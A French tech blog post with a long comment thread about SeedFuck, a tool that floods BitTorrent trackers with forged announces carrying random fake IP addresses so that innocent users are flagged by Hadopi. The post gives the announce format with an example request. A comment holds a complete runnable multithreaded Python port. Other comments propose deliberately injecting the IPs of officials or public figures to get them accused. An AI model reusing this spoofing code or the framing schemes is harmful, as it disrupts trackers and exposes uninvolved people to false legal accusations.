SeedFuck – Hadopi va couper la connexion internet de milliers d’innocents
| Nb visites : 22 171 |

Je vous en avais déjà parlé, The Pirate Bay envisageait il y a quelques temps de balancer sur les réseaux p2p et Bittorrent plus particulierement, des fausses adresses IP, générées aléatoirement. L’idée était simple : Plus il y a de fausses adresses IP qui circulent, plus des innocents vont se faire ramasser par Hadopi…
Ça peut paraitre méchant et injuste mais au final, ça fera peut être réfléchir les défenseurs de cette loi, que l’adresse IP n’est pas une preuve suffisante pour déterminer si quelqu’un a téléchargé illégalement ou pas une oeuvre.
Quoiqu’il en soit, le code source en C#, baptisé SeedFuck, qui permet de polluer les réseaux Bittorrent avec ces adresses IP générées (peut être la votre ?), vient d’être rendu public et pourra être adapté et intégré dans tous les clients torrents, ou sur des machines fonctionnant à part. Ainsi, avec une simple connexion haut débit, il est possible en 5 minutes de générer des milliers de fausses adresses IP qui créeront un genre de « faux » trafic sur le réseau et qui seront potentiellement détectable par l’Hadopi et compagnie. Le binaire pour Windows est déjà dispo d’ailleurs…
Voici un extrait des explications contenues dans le code source :
The announce works like this:
http://tracker.example.com/announce?info_hash=<hash>&peer_id=<id>&uploaded=0&downloaded=0&left=<left>
&event=<event>&port=<port>&numwant=<n>&ip=<address>
Where:
- <hash> is the infohash of the torrent, escaped.
- <id> is a random 20 character id generated by the client to identify itself.
- <left> is the number of bytes left to download. use 0 when seeding.
- <event> is the type of announce you are issuing. use « completed » if you’re seeding, or « started » if downloading.
- <port> is the local port on which your BitTorrent client is accepting connecitons.
- <n> is the number of peers you wish to fetch. keep this low for repeated multiple requests.
- <address> is the IP address that you wish to be bound to.
The address parameter is normally used when users are behind a firewall or NAT router, but for most trackers
it can be set to absolutely anything – including a DNS. An example of a request would be the following:
http://tracker.example.com/announce?info_hash=%e6%8e%c7%d9%64%7a%d3%22%23%8c%e9%81%cb%aa%5a%24%fe%a5%2d%81
&peer_id=01020304050607080901&uploaded=0&downloaded=0&left=0&event=completed
&port=1234&numwant=5&ip=123.45.67.89
Ça craint !! Mais ça va être le bordel, donc on va forcement bien rire… bah quoi ?
Merci à Ilan pour l’info
Je vous recommande aussi la lecture des sujets suivants
- OpenBittorrent – le tracker libre successeur de ThePirateBay
- Importer des adresses emails dans Thunderbird avec Address Crawler
- Sp2 TCPIP Patcher
- BLUEBEAR – Explication technique qui va faire trembler les utilisateurs de bittorrent
- Net Tools – Testez votre sécurité
- Décoder un mot de passe en MD5
- Le SNEP veut définitivement couper le p2p (légal ou non…)
- Despotify : Un vrai client Spotify pour Linux
- Gource – Réalisez une animation à partir de votre code source
- Viva Italia !








Amaury
J’ai lu qu’il est même possible de mettre n’importe quelle adresse IP, même du ministère…
Posté le 16 avril 2010 à 15:33:56
C6LE
Comme quoi il faut rester sur les trackers privés.
Posté le 16 avril 2010 à 15:35:10
Bubu
@Amaury: il suffit de modifier la fonction GenerateIP() pour renvoyer une adresse de ton choix et de recompiler le tout (ou mieux, d’ajouter cela en paramètre de l’exécutable).
Concernant le langage, dans la source, l’auteur parle de C# et non de C Mono. Je me trompe peut-être, mais ce ne sont pas deux langages distincts?
Posté le 16 avril 2010 à 15:38:10
gilles
@C6LE: ca ne changera rien du tout… si ton IP est prise au hasard…
Posté le 16 avril 2010 à 15:39:31
LegGohan
Ca va carement être le gros bordel lol.
Si je reçois une lettre je dirais que c’est la faute à SeedFuck
Posté le 16 avril 2010 à 15:39:49
harold
C’est sûr que l’adresse IP, c’est pas sûr…
M’enfin, ça m’ennuierai bien de me faire tauper par Hadopi alors que je ne pratique pas ni torrent ni P2P
Posté le 16 avril 2010 à 15:40:32
Amaury
@Bubu: Effectivement, je m’attendais à un code source énorme mais en fait il est assez simple !
En plus de l’intégration dans les torrent, même créer un GUI autour de ça pour en faire profiter les kikoolol est possible tellement le code source est simple ^^
Posté le 16 avril 2010 à 15:40:40
Shahor
Ça va être très bien ce soft.
Alors certes ça va un peu chouiner au départ, mais ça va tellement démontrer la débilité du système hadopi que ça va forcément obliger les gens à réfléchir.
Ça les changera un peu
Posté le 16 avril 2010 à 15:42:40
mathieui
Ajoute que son utilisation est illégale en france, on sait jamais…
Posté le 16 avril 2010 à 15:43:03
Bubu
@Amaury: tu m’étonnes. D’ailleurs, on dirait que ça ne fait que des appels d’URL. Un navigateur suffirait ?
Est-ce que finalement ça ne pourri pas que le tracker ? Il suffit de voir si le transfert de données fonctionne (P2P inside) pour distinguer les vraies des fausses adresses.
Posté le 16 avril 2010 à 15:44:57
Tobias
On va faire du téléchargement avec SeedFuck en indiquant les adresses IP du Ministère et de l’Hadopi ! Ils pourront se couper leur propres connexions.
Posté le 16 avril 2010 à 15:45:08
killruana
Juste pour info, le « C Mono » n’existe pas
La source est en C#.
Et si j’ai le temps, je le recode en python
Posté le 16 avril 2010 à 15:45:24
Hogx
Ca me donne envie de télécharger des torrents, ce que je n’ai jamais fait
, pour envoyer plein d’adresses ip de personne pro-HADOPI…
Qui connaît celles de Jack Lang et de Pierre Arditi?
Posté le 16 avril 2010 à 15:49:12
Ravaged
Il serait temps qu’ils se rendent compte que leur système ne tient pas debout :/
Ils n’ont qu’à s’occuper du SPAM puisque 90 ou 95% des mails mondiaux sont du SPAM, faut imaginer la claque sur la bande passante, comme ça ils serviront à qq chose et on les remerciera!!
Posté le 16 avril 2010 à 15:50:38
Letoine
Salut Korben, all,
Ce qui pourrait être super marrant ce serait de reprendre les adresses des bases de Peerguardian comme ça on prendrait non seulement celles des ministères mais surtout celles des postes des majors connectés au P2P…
A méditer !
@mathieui >> Le téléchargement d’oeuvres protégées par les lois du coyright aussi est illégal en france ?!
Posté le 16 avril 2010 à 15:51:02
Fightsoul
Pour info Mono c’est le portage de .NET sur Linux il me semble (voir wikipedia : http://fr.wikipedia.org/wiki/Mono_%28logiciel%29)
Posté le 16 avril 2010 à 16:00:11
manatlan
Tu es en retard korben
il y a même déjà la version python, dispo en webservice, plus d’infos là:
http://bluetouff.com/2010/04/16/seedfuck-porte-en-python-avec-un-frontend-web/
Posté le 16 avril 2010 à 16:01:46
suredj
rétrospectivement c’est une peu se tirer une balle dans le pied.
Seedfuck va compliquer la tache à hadopi mais aussi faire pas mal de coupure internet injuste.
Dans un premier temps cela va augmenter les frais de fonctionnement de l’Hadopi qui est subventionné, je me permet de le rappeler, par NOS impôts (pour ceux qui en paye).
Dans une deuxième temps je trouve ca bien dégueulasse de faire accuser d’autres personnes surtout quand ont sais combien il est difficile de faire valoir ses droits dans une injustice avec l’État (je pense aux amendes avec les radars automatique par exemple), la il n’y a pas de photos ou quoi que ce soit … « votre ip correspond à ce téléchargement et point barre » aucun moyen de prouver son innocence dans le cas d’un dommage collatéral, mais la c’est carrément abusé!
Alors que des solutions simple et peu onéreuse comme le VPN existe et court-circuite efficacement l’Hadopi je ne vois pas pourquoi ont accuserais d’autres à tort … ou pas.
Posté le 16 avril 2010 à 16:09:46
DrSnake
cool, un truc presque utile et fun sur Mono !
Posté le 16 avril 2010 à 16:11:38
pikepeak
plus d’innocents vont se faire ramasser ..
Posté le 16 avril 2010 à 16:12:47
Efre
Héhé bien joué TPB! Au fait quelqu’un a des nouvelles des soit-disant lettres d’Hadopi?
Posté le 16 avril 2010 à 16:24:11
dd
A mon avis, ce n’est pas la bonne solution.
Pour moi, il faut rendre le téléchargement des adresses IP torrent illégales pour les entreprises ou administration. Seules les personnes physiques auront le droit. C’est possible si le protocole des trackers est changé.
Posté le 16 avril 2010 à 16:26:11
PinKponK
@Efre : je suis en train de t’envoyer la tienne. Peux-tu me redonner ton adresse mail valide ? Je t’ai vu télécharger « Jolie poupée » de Bernard Menez. Merci d’avance.
Posté le 16 avril 2010 à 16:28:58
pipomolo
Suis-je le seul à m’inquiéter que ça mette à genoux les trackers et pénalise le traffic bittorrent dans son ensemble ? Car tous ces faux peers ne seront pas vus que par les gens de l’HADOPI, mais aussi par ceux qui téléchargent…Si tout le monde se met à polluer les trackers, ça va être galère de trouver des peers valables, sans parler que ça faussera complètement les stats de seeding/leeching…on dirait bien qu’on a affaire à une fausse bonne idée.
Posté le 16 avril 2010 à 16:32:24
JeromeJ
Aie aie aie … la bonne mauvaise solution x)
Posté le 16 avril 2010 à 16:43:08
Hogx
@pipomolo: En effet, c’est la première chose qui m’est venue en tête. Certes le trafic risque d’être sacrément perturbé, mais si ça permet d’avoir une jurisprudence bien définitive sur le fait qu’un simple relevé d’adresse ip n’est en aucun cas une preuve, ce sera toujours ça de gagné, et il sera alors inutile de conserver ce système.
Posté le 16 avril 2010 à 16:51:30
Toutestici
Comme tu le dit ça craint !
Posté le 16 avril 2010 à 16:54:59
Letoine
Le problème avec les décisions de nos dirigeants c’est que ce n’était pas non plus « la bonne solution » mais ils l’ont fait.
Selon moi par conséquent, c’est une réponse à hauteur de leur stupidité (donc pas forcément intelligente) et surtout de leur ignardise technique et technologique (je retrouvais ma pote Albanel cité dans un commentaire d’un autre article avec ses pare-feu dans Open office par exemple).
Cette solution (s’il en est) me semble être simplement l’ignition de l’implosion de cette loi futile à peine bonne à faire gagner de l’argent à Thierry Lhermite (Hop, mieux que Dartyn je vous offre le Triple-Troll dans ce commentaire).
Posté le 16 avril 2010 à 16:57:06
JeeK
…j’sais pas pourquoi, mais j’ai un « mauvais feeling » sur ce coup là !
Sans être nécessairement paranoïaque…est ce que par l’utilisation de ce genre d’outils, on ne va pas (de façon générale) inciter le « legislateur » à aller encore plus loin !? Tout simplement parce que ça donne sens aux propos qui sont galvaudés partout et qui disent qu’internet, c’est un refuge de « délinquants / pédophiles / terroristes / etc… »(rayez les mentions inutiles) !
Grat’… Dieu que j’espère me tromper !!!
Posté le 16 avril 2010 à 17:00:26
Bekhan
Moi je trouve que c’est très méchant, je veux dire le pauvre citoyen qui achète ses films et ses albums de Celine Dion et qui ne sait même pas ce que « torrent » et « P2P » signifie aura des soucis avec la loi.
Enfin, moi je suis en Belgique, je risque pas grand chose.
Posté le 16 avril 2010 à 17:02:27
Lamb
Excusez-moi, question peut-être stupide mais: vous avez l’air de dire que la connexion sera coupée pour une personne dont l’adresse ip aura été mise sur le réseau à son insu. Or, si j’ai bien compris le principe de HADOPI, c’est qu’il y a d’abord des mail et des lettres recommandées qui sont envoyées. Donc la coupure ne se fera pas du jour au lendemain. Alors certes pour se défendre, ça sera pas du gâteau, mais il aura le temps de réagir… voir d’installer le spyware de l’état s’il veut prouver son innocence :/ (d’ailleurs, suffit de lancer une machine virtuelle, d’installer leur merde, et hop pas de problème, si ?)
Bref, concernant ce truc… c’est du même niveau qu’Hadopi à mes yeux…
Posté le 16 avril 2010 à 17:17:34
BlackSmileFR
Moi je trouve ça très bien, ça va remettre les choses en places, il faut cependant faire attention à la diffusion.
Pour ceux qui disent blablabla, nos impôts ci et là, je leur rappelle que on finance une loi à la C.. qui sert des majors PRIVÉ (c’est comme pour les banques) pour s’en mettre plein les poches !! alors qu’est ce que ça fait si pendant un laps de temps c’est un peu le bordel (car si on vous plante votre connexion il faut se dire que va y avoir beaucoup de monde dans votre cas !!)
Alors si ça peut faire aller en arrière la chose alors je vote : +++
effectivement ça sera un peu triste au début pour ceux qui ont rien fait mais quand les juges recevront la moitié des plaintes de la part de mairies ou d’entreprises, d’associations et de services publiques, ils poseront quand même des questions (bien que plus rien ne m’étonne)
L’idéal serait d’envoyer que des IP de services publiques et de grandes entreprises : la ils seraient vraiment emmerdés !
Posté le 16 avril 2010 à 17:18:48
n4ji
les hadopistes la, ils se basent sur :
« toi tu m’as seed une partie de céline dion »
donc j’ai t’as vrai IP et jtenvoi un joli mail (en passant par la case FAI biensur)
parce que je pense qu’il doit y avoir échange de donnée sinon c’est totalement débile comme méthode. Et dans le cas contraire si ya bien échange de donnée pour constatation de l’infraction, bah la seedfuck sert absolument a rien… puisque une IP généré va pas répondre aux requetes du leecher
Posté le 16 avril 2010 à 17:18:54
Manu
FBI : Fausse Bonne Idée.
Pondre un source pour pourrir Hadopi, alors que ça va aussi pourrir des gens qui ne téléchargent rien, c’est franchement pas malin. C’est du niveau CM1/CM2 : mééé c’est lui qu’à commencé m’dame, alors moi je fais pareil !
Posté le 16 avril 2010 à 17:19:36
Hogx
@ « A ceux qui trouvent ça injuste pour les innocents » :
J’ai deux petites questions pour vous :
Trouvez-vous normal que vos « gentils » représentants aient voté une loi qui valide des preuves qui n’en sont pas au mépris de la présomption d’innocence? Et que l’état délègue ces relevés à des entreprises privés de parti pris?
Posté le 16 avril 2010 à 17:20:28
turn
Il ne faut pas oublier que pour la plupart des oposants a cette loi, c’est pas pour pouvoir telecharger tranquillement, et impunément le dernier album de lara fabian qu’ils se battent, mais pour un ideal de liberté sur le net.Et de la même que le net ne se réduit pas a un nid de pirates/ terroristes / pedophiles (qui n’ont d’ailleur pas attendu internet pour exister)comme aimerait le faire croire certaines personnes , la pseudo lutte contre ces meme individus ne peut pas se reduire par des lois aussi stupide et liberticide qu’hadopi et loppsi entre autre. Autant donc sapper leurs fondement dès le début.
La methode employé dans l’article parait extreme et peut certainement causer quelques dommages collatéraux, mais c’est autant de sacrifice nécéssaire si on veut pouvoir maintenir l’internet comme un des dernier bastion de la liberté… pke autant dire que en dehors du net plus ca va, et plus les liberté diminuent comme peau de chagrin
Posté le 16 avril 2010 à 17:21:08
Lars
Ca, ca pue du cul.
Alors ca, ca fait chier.
D’autant plus pour la personne bien malchanceuse qui va se faire copier 3 ou 4 fois sont IP…
Posté le 16 avril 2010 à 17:21:45
discordia
aahhh moi je trouve ça super, oui oui au début quelques personnes vont avoir quelques frayeurs avec quelques lettres, mais quand ils vont se retrouver à devoir envoyer une lettre dans chaque foyé, même cher le président aller savoir^^
Quelqu’un à un moment vas dire stop, cette loi est inapplicable, hop au placard => [ -]
Dès que ça vas se savoir ce système, même si vous vous êtes vraiment fait détecté sur un réseau P2P, il suffira de dire que c’est de ce genre de truc que ça vient, et vous serez innocenté.
En plus de ça ils seront vite à court de papier.
Posté le 16 avril 2010 à 17:22:19
somonflex
C’est ça qu’on veut :fou:
Posté le 16 avril 2010 à 17:23:07
Jérem
« Enfin, moi je suis en Belgique, je risque pas grand chose. »
Note qu’en Belgique on à le MR Monfils qui a lancé l’idée d’un hadopi à la belge. Si ça se trouve, on va bientôt recevoir:
« Uw internetverbinding is nu ontgrendeld »
Un surveillance du net, enfin un moyen efficace de savoir dans quelle langue surfent les habitants de la périphérie bruxelloise ?
Posté le 16 avril 2010 à 17:26:32
jemil
Ca tombe bien, les IP des serveurs de Trident Media Guard viennent juste d’être publiés (voir l’article sur Numerama)…
Ceci dit, j’ai des craintes sur les conséquences de l’utilisation « massive » de cet outil… Il est évident qu’injecter les IPs du ministère de la culture, de TMG ou de l’assemblée nationale ne servira à rien: au pire, l’affaire se réglera discrètement en coulisses.
Si on veut faire du bruit, c’est malheureux, mais il faudra probablement « mouiller » de vrais innocents. Et si possible des innocents qui disposent d’un accès aux grands médias: artistes, journalistes, sportifs… Des gens qui ne téléchargent rien et qui vont à juste titre crier au scandale quand ils vont recevoir un courrier d’Hadopi. Oui, ça s’appelle de l’instrumentalisation, mais il me semble que c’est la seule utilisation pertinente qu’on pourrait faire d’un outil comme Seedfuck. Tout le reste sera, au mieux, parfaitement inutile…
Posté le 16 avril 2010 à 17:27:38
primalmotion
le C# sapu :
La meme en python
#
# SeedFuck.py
#
# Copyright (C) 2010 Moi
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see .
import sys, os, urllib, random
from threading import Thread
MAX_THREAD = 40
class SeedFucker(Thread):
def __init__(self, tracker_url, torrent_hash, use_random_ip=True, be_seed=True):
self.torrent_hash = self.encode_hash(torrent_hash)
self.use_random_ip = use_random_ip
self.be_seed = be_seed
self.tracker_url = tracker_url
Thread.__init__(self)
def generate_ip(self):
return « %s.%s.%s.%s » % (random.randrange(1, 255, 1), random.randrange(1, 255, 1), random.randrange(1, 255, 1), random.randrange(1, 255, 1))
def encode_hash(self, some_hash):
hashEncoded = « »;
for i in range(0, 20):
hashEncoded += « % » + some_hash[i * 2] + some_hash[(i * 2) + 1];
return hashEncoded;
def generate_peer_id(self):
peer_id = « »;
for i in range(0, 20):
peer_id += str(random.randrange(0, 9, 1))
return peer_id;
def make_announce(self):
ip = self.generate_ip()
torrentEvent = « completed » if self.be_seed else « started »
peer_id = self.generate_peer_id();
left = 0 if self.be_seed else random.randrange(1024, 1024 * 1024, 1)
port = random.randrange(1024, 33000, 1);
url = « %s/announce?info_hash=%s&peer_id=%s&port=%d&uploaded=0&left=%s&event=%s&numwant=5&ip=%s » % (self.tracker_url, self.torrent_hash, peer_id, port, left, torrentEvent, ip)
return url
def run(self):
loop = True
while loop:
url = self.make_announce();
print url
try:
urllib.urlretrieve(url)
except:
print « unable to connect %s » % url
loop = False
if __name__ == « __main__ »:
for i in range(1, MAX_THREAD):
seedFucker = SeedFucker(sys.argv[1], sys.argv[2]);
seedFucker.daemon = False
seedFucker.start()
usage :
SeedFuck.py # http://tracker.openbittorrent.com 1d7e4cf69af1d88ba426572bfb98c4f603f5d2c1
Ca au moins ca marche partout
Posté le 16 avril 2010 à 17:38:26
primalmotion
Le C#/Mono ca sux.
http://pastebin.com/CdjKKZRx
En python. Ca marche partout.
Posté le 16 avril 2010 à 17:39:38
JaguarTique
Je m’étais remis au direct DL, mais vu les circonstances, je vais ressortir mes torrents
Par contre étant une bouse en tout ce genre de truc avec des C majuscules et des #; qu’est ce que l’utilisateur lambda doit faire pour lui aussi foutre son bordel ? Ou est-ce automatiquement « integré » avec les torrents qu’on télécharge ? Et à partir de quand ça va commencer ?
Posté le 16 avril 2010 à 17:45:31
Cerise
@ Jemil : en attendant certains artistes le mériteraient bien, tel enrico macias qui soutient hadopi alors que personne, non personne ne doit télécharger ces albums …
Ce qui serait intéressant de savoir comme l’ont dit certains, c’est si ça marcherait vraiment, vu que l’IP générée ne téléchargera pas et n’enverra pas un ko de données autre que de faux états du genre « téléchargement fini » …
Posté le 16 avril 2010 à 17:53:20
Hack45 : le bug de la blogopshère orléanaise » Seedfuck déchaine le Net
[...] voir les réactions diverses sur Numerama, PC-Inpact, Clubic, Zataz ou les blogs de bluetouff et de Korben [...]
Posté le 16 avril 2010 à 18:01:46
lowax
le générateur d’adresse mac est t’il fournie avec ? …
je pense que il y a des trucs a revoir
Posté le 16 avril 2010 à 18:02:42
MikeZ
Le plus con ca va etre ceux qui utilisent le DDL qui vont se retrouver avec leur ip sur torrent..
« Je suis innocent »… Sauf que si ya perquiz….. Ha ben pas de p2p certes mais crack boum dedans quand même….
Ce code est une nuisance pour les DDLEURS de touts poils et les gens honnêtes…
Ou alors il faut espérer que… les gens vont pas générer de l’aléatoire mais bon mettre des listes d’ip genre Ministeres, SACEM, TMG, Univers Sale, …
Messieurs les programmeurs, soyez pas cons par pitié , ne nuisez pas à l’internaute moyen pedonazi mais a nos honnetes politiciens ou majors…
Il y a de l’ironie dans ce post, saura tu le voir?
Posté le 16 avril 2010 à 18:07:39
halford
Atroce, de toute façon avec HADOPI, personne n’est innocent à part l’industrie musicale qui a réussi à se voter une loi aux petite oignons.
Posté le 16 avril 2010 à 18:18:04
dosibox
Il est où l’exe ? Je le veux.
Je pense que çà va surtout surcharger jusqu’à saturer les serveurs des trackers.
Posté le 16 avril 2010 à 18:26:23
jemil
@Cerise: oui, il le mériterait amplement, mais on peut être certain que s’il reçoit un courrier de l’Hadopi, il se contentera de passer un coup de fil, tout s’arrangera miraculeusement, et personne n’en saura jamais rien. Idem pour Albanel, Riester, Fredo ou la permanence de l’UMP à Chateauroux.
Or l’objectif, ce doit justement être de mettre la débilité de cette loi et la cupidité des majors sur la place publique. Et pour ça, il faut que des innocents susceptibles de protester publiquement soient frappés. Pas sûr d’y être personnellement favorable, mais d’un autre côté ce genre d’erreur est inscrit dans le code génétique de l’Hadopi elle-même.
Posté le 16 avril 2010 à 18:31:14
Celius
@lowax: Effectivement, il y a des trucs à revoir. Tes cours de réseau par exemple…
Posté le 16 avril 2010 à 18:34:19
Foudge
Ravaged> Sauf que les email (SPAM compris) c’est négligeable en terme de bande passante comparé au P2P. Bref, c’est pas ça qui changera grand chose.
Posté le 16 avril 2010 à 18:51:23
Cerise
@ Jemil : oui c’est vrai ça va faire beaucoup de malchanceux m’enfin quand ce bout de code se sera répandu un peu partout, je pense qu’ils auront des remontées des FAI dès les premiers avertissements puisqu’il risque d’y en avoir des masses dès le départ … donc on arrivera peut être jamais jusqu’à la nécessité de protester … mmh je crois que je m’emballe positivement !
Posté le 16 avril 2010 à 18:55:35
nevaram
Je ne suis vraiment pas sûr qu’ils utilisent cette requête pour détecter les téléchargeurs fous.
Apparemment c’est une requête pour initialiser la connexion, le téléchargement en soi se fait sur un autre port ?
Est-ce qu’un expert pour nous confirmer l’utilité de ce soft ?
Posté le 16 avril 2010 à 19:12:30
stakhanov
Mouais, prendre des innocents en otage ce n’est pas très malin ni très glorieux je trouve. Surtout qu’il ne faut pas se faire d’illusions, Hadopi gêne surtout ceux qui téléchargent du contenu copyrighté, il faut quand même le dire ! Les pseudo excuses du genre « le web espace de liberté » c’est une vaste fumisterie……
Ce truc c’est un peu comme les terroristes qui font sauter des innocents au nom d’une « cause ».
C’est avant tout une monstrueuse lâcheté…….
Posté le 16 avril 2010 à 19:23:05
Mono
« Il ne faut pas oublier que pour la plupart des oposants a cette loi, c’est pas pour pouvoir telecharger tranquillement, et impunément le dernier album de lara fabian qu’ils se battent, mais pour un ideal de liberté sur le net. »
AH AH AH AH !
J’avais pas ri comme ça depuis longtemps.
Remarque, tu as pas peut-être raison, ça n’intéresse pas tant que ça les pirates, le téléchargement. La preuve, quand un administrateur de leurs sites préférés finit en prison, il n’y a plus personne pour le soutenir. La réaction c’est : « on s’en fout, on connaît un autre site ».
Donc tu dois avoir raison, c’est un idéal de liberté qui motivent ces internautes-téléchargeurs. De liberté pour eux bien sûr, pas pour les autres, faut pas déconner.
Posté le 16 avril 2010 à 19:28:23
Datawolf
Une mauvaise solution pour lutter contre une mauvaise solution à un faux problème : BEURK !
Posté le 16 avril 2010 à 19:37:49
mops
@Hogx: ajoute en un peu
http://www.pcinpact.com/actu/news/56327-hadopi-crise-cour-compte-controle.htm?vc=1
Posté le 16 avril 2010 à 19:38:51
Jérem
« Hadopi gêne surtout ceux qui téléchargent du contenu copyrighté »
Là dessus, je ne suis pas d’accord. Un hadopi bien fait, je verrais pas le problème.
Cet hadopi là, avec son cortège d’incompréhension, d’inculture et de bêtise heurte ma conscience. Car il ne faut pas oublié qu’hadopi prend des libertés avec le droit: il renverse la charge de la preuve, foule au pied le principe fondamental de la personnalité de la peine pénale et propose comme solution pour prouver sa bonne fois de télécharger un programme-espion d’état ne tenant pas compte du monde du logiciel libre (ça va tourner sous linux ? savent-ils seulement l’épeler ?)…
C’est le fait de créer une loi aussi liberticide pour protéger du pognon qui embête, et pas uniquement les « pirates ».
Je veux bien des lois pour protéger le pognon, en fait je m’en fous. Mais il faut pas que ça ait des conséquences pareilles pour un résultats si minime. C’est tout.
On peut défendre le principe d’hadopi, pas hadopi en lui-même (ou alors, on est bon pour défendre satan lui-même devant l’inquisition).
Posté le 16 avril 2010 à 20:03:10
Bab-2
Mais pourquoi vouloir forcer les autorités à revoir Hadopi?Les gens qui téléchargent vraiment sont ravis d’Hadopi telle qu’elle existe!!!!
Posté le 16 avril 2010 à 20:09:50
Jango
ca parait bien ca , mais je me permet d’emmetre un doute. bon j’y connais absolument que dale en protocole torrent peer seed et tout le toutim , mais que pensez vous que vont faire les techniciens chargés de mettre en œuvre le système hadopi quand ils verront ce programme ?
si j’ai bien compris , aucun téléchargement n’est initialisé ? si hadopi est bien faite ,elle se basera sur plusieurs trames de download pour etre sur que l’ip est bien en train de télécharger et que ce n’est pas un fake.
non ?
Posté le 16 avril 2010 à 20:19:05
mrpat2001
Info pris du site http://www.paperblog.fr/3101363/seedfuck-porte-en-python-avec-un-frontend-web/
en tous cas cela reagit de tout les cotes .
a preciser que c’est illegal aussi
Posté le 16 avril 2010 à 20:24:35
clovisnox
C’est le principe de :
– Tu joue au con ?
– Ouais
– Je sais jouer aussi
Posté le 16 avril 2010 à 20:37:50
flo
A part pourrir le torrent du dernier album de celine dion, je ne vois pas l’intérêt. Ils vont clairement se baser sur les IP qui partagent *effectivement* le fichier, pas ceux qui sont annoncés par le tracker comme soit disant seeders. Rien qu’avec ça, ils en auront déjà à la pelle des IP (mme michu qui laisse son repertoire « Musique » en partage).
Posté le 16 avril 2010 à 20:45:32
Bubu
@flo: A la pelleteuse !
Et si nous aussi on faisait nos petits listings d’IP ? Héhé…
Posté le 16 avril 2010 à 21:03:57
Someone
Heu… forger des requêtes HTTP avec des fausses IP, c’est bien, mais HADOPI va sûrement plus se pencher sur le transfert P2P entre les utilisateurs connectés entre eux (certes reliés via le tracker). Il y a forcément à un moment donné un échange TCP entre deux entités pour le téléchargement *réel* et cela fait intervenir les vraies IP.
Cf. la RFC sur le TCP.
Posté le 16 avril 2010 à 21:14:37
Sebboost
Et le jour où ce petit logiciel est intégré à un rootkit ou meme un vers ca va etre le souc, enfin moi je dis ca je dis rien. Loin de moi l’idée de donner de mauvaises idées justement mais en même temps je pense que ca pourrai arrivé sans problème.
Posté le 16 avril 2010 à 21:30:31
Sebboost
Le jour ou ce petit logiciel est intégré à un rootkit ou à un vers ca va etre le souc. Moi je dis ca je dis rien mdr.
Posté le 16 avril 2010 à 21:32:21
carado
N’empeche maintenant on risque autant a pirater qu’a pas pirater. Peut-etre meme moins.
lol, hadopi.
Posté le 16 avril 2010 à 21:44:29
adream
qui dit plein de fausse ip et ban par hadopi, dit aussi moin de monde sur korben haaaaaa comment je vais faire si je vois pas korben.info tts les jour moi lol
Posté le 16 avril 2010 à 21:45:03
adream
d’ailleur hadopi est mis en pratique? la dat eofficiel? car il parler qu’on devrai mettre un logiciel sur le pc a un moment, sa en est ou tt sa?
Posté le 16 avril 2010 à 21:46:53
Lucas63
STOP …. HADOPI c’est SUPER et voilà pourquoi :
Depuis que c’est voté, j’ai arrêté tout P2P et torrent que j’utilisais par facilité, et j’ai découvert les IP masqués, le DDL et les débrideurs, les Newgroups, les VPN, et même Freenet, bref que du bonheur sans risque.
Alors laissez nos corniauds de gouvernants faire mumuse avec HADOPI et le P2P « à poil »; pendant ce temps, en cherchant un peu, on est vraiment libre sur le reste et c’est çà qui compte. Finalement, je dis merci à HADOPI qui permet de DL à un film en 20mn en moyenne au lieu de minimum 2h00 et surtout de trouver beaucoup plus de choses avec quasi aucun fake. C’est malin, mon HD d’1,5 To est plein, je viens d’en commander un de 2 To et j’espère tenir un mois ou deux, mais c’est pas sûr …
Donc soutenons HADOPI et surtout chut …. Laissons croire que c’est efficace.
Bises à tous et merci à toi Korben pour tous ces tuyaux. J’attends plus que ton avis sur put.io pour aller y faire un tour
Posté le 16 avril 2010 à 22:05:58
KylanDomos
Simple Question de Noob ^^ :
Comment feras l’ »Hadopi » pour voir si on télécharge du contenu Copyrighté ou le Dernier Iso d’Ubuntu dispo en *.torrent ?? =D
Posté le 16 avril 2010 à 22:17:01
Jango
ils scannent les IP sur un hash(une signature du fichier), donc ton ubuntu ne sera pas vérifié , ils scannerons les fichiers a fort trafic comme Avatar en dvd par exemple ^^
Posté le 16 avril 2010 à 22:29:32
TheX
D’abord, le principe de la riposte gradué est que l’on reçoit un email, puis une lettre, puis on coupe.
SeedFuck est peut-être pas si mal… Ya peux de chance que sa tombe trois fois sur la même personne !
Posté le 16 avril 2010 à 22:35:42
adream
korben a fait un article la dessus, 2 societé si je ne me trompe pas, vérifierons les fichier avec copyright, exemple, universal sort iron man 2 et décide de l ‘interdire au DL; il prévienne la ou les 2 société en question, les société passe leur journée a cherche les fichier sur les torrent etc etc et vérifie que se sont les bon film, uen fois cela fait, il renvoi les ip a universal, et universal a hadopi un truc ds le genre quoi
regarde dans les ancien article korben en parler
Posté le 16 avril 2010 à 22:36:23
adream
@KylanDomos:
voila l’article que je parler pour répondre a ta question ( PS je suis gentil j’ai relu 43 ou 45 page pour retrouver l’article lol )
http://www.korben.info/trident-media-guard-hadopi.html
Posté le 16 avril 2010 à 22:45:59
QuentinZone
je trouve l’idée intéressante
Posté le 16 avril 2010 à 22:52:11
guilde
Société de cons : logiciels de cons.
Entre Hadopi, ACTA… ce genre de logiciels, les nouvelles plateformes dématérialisées pour le jeu, la musique, la lecture etc…vraiment tout ça c’est de la merde je vous le dit.
Posté le 16 avril 2010 à 22:55:57
Cerise
Faudrait pas qu’il y en ait qui oublie que le Peer to peer ne sert pas qu’à télécharger du contenu illicite. Ca permet aussi de télécharger bon nombre de distributions linux avec une facilité déconcertante (c’est pratique, ça ne surcharge pas les petits serveurs), mais aussi à partager de la musique libre et des ouvres libres en générales.
De plus, faudrait pas oublier qu’il faudra (ou en tout cas il en a été très longtemps question ) avoir un antivirus imposé et agréé par l’état obligatoirement sur son ordinateur. Je vois pas en quoi c’est plaisant. Quand on sait qu’il sera c’est quasi sur incompatible linux de base, ça veut dire exit os libre, merci bien.
Il ne faut pas oublier aussi ce qui va avec, le délit de non sécurisation, qui fait que si vous avez le malheur de ne pas savoir sécuriser votre connexion internet wifi et que le petit kevin, 12 ans, d’à côté, télécharge depuis votre ip, ce sera vous qui recevrez la lettre. Vous ça ira peut être, mais les vieux qui ont internet chez eux et qui y connaissent rien, vous y avez pensé ?
